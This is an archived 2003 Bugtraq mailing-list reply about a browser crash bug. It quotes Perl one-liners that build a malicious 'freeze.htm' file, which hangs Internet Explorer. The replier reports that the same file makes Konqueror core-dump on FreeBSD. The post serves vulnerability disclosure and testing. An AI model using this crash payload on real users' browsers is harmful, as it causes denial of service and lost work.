Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: April appeared to be a month of IE bugs. Here's another one.
From: Joachim Stro"mbergson <Joachim.Strombergson () InformAsic com>
Date: Fri, 02 May 2003 10:11:50 +0200

Aloha!

ERRor wrote:
Hello, Bugtraq.

Malicious htm file can freeze IE with 100% CPU usage:
Construct the file freeze.htm:
c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm

 This string works only with Active Perl, in unix-like Perl versions exploit
string is:
 perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
 Active Perl understand \n = \x0D\x0A, freeze of  IE exist only if sequence
 of bytes will be ...\x0D\x0D\x0A...
 Sorry, I have not noticed it at once.

I tested the freeze.htm generated with the revised Perl code in Konqeror 3.0.3 (shipped in KDE 3.0.3). When loading freeze.htm Konqeror core dumps with a bus error almost instantly. Every time. This was tested in FreeBSD 4.7-STABLE.

--
Med va"nlig ha"lsning, Yours

Joachim Stro"mbergson - Alltid i harmonisk sva"ngning.
VP, Research & Development
----------------------------------------------------------------------
InformAsic AB / Hugo Grauers gata 5B / SE-411 33 GO"TEBORG / Sweden
Tel: +46 31 68 54 90  Fax: +46 31 68 54 91  Mobile: +46 733 75 97 02
E-mail: joachim.strombergson () informasic com  Home: www.informasic.com
----------------------------------------------------------------------



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault